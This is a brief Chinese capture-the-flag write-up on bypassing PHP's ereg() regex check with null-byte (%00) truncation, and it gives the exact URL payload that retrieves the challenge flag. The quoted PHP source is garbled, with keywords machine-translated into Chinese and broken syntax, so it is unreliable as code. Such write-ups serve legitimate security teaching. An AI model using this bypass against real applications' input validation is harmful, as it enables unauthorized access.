/X00截断
1.@ereg()函数功能
int ereg(string pattern, string originalstring, [array regs]);
(1)@ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字母的字符是大小写敏感的。
(2)可选的输入参数规则包含一个数组的所有匹配表达式,他们被正则表达式的括号分组。
2.直接上源代码
(http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php) ```
if(isset($ _GET [‘nctf’])){
* f(@ereg(“^ [1-9] +
_GET [‘nctf’])=== FALSE)*)
回声 ‘必须输入数字才行’;
else (strpos($ _GET [‘nctf’],’#biubiubiu’)!== FALSE) SE)
死(‘旗:’。$ flag);
其他
回声 ‘骚年,继续努力吧啊〜’;
}
``
1.@ereg(“^ [1-9] + _GET [‘nctf’])=== FALSE)即nctf中必须是数字的形式。
2.列表内容(2)strpos($ _GET [‘nctf’],’#biubiubiu’)!== FALSE)即nctf中必须包含’#biubiubiu’字
符串。3.这时候我们就会想怎么绕过@ereg函数,下面来看看@ereg函数存在的漏洞吧
- @ ereg()函数存在的漏洞
@ereg()函数存在NULL截断漏洞,导致正则过滤被绕过,所以可以用%00来截断正则匹配
第一个条件我们先用%输个数字,然后用%00进行截断,第二个条件输入%23biubiubiu,我们来看一下结果。
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=13134%00%23biubiubiu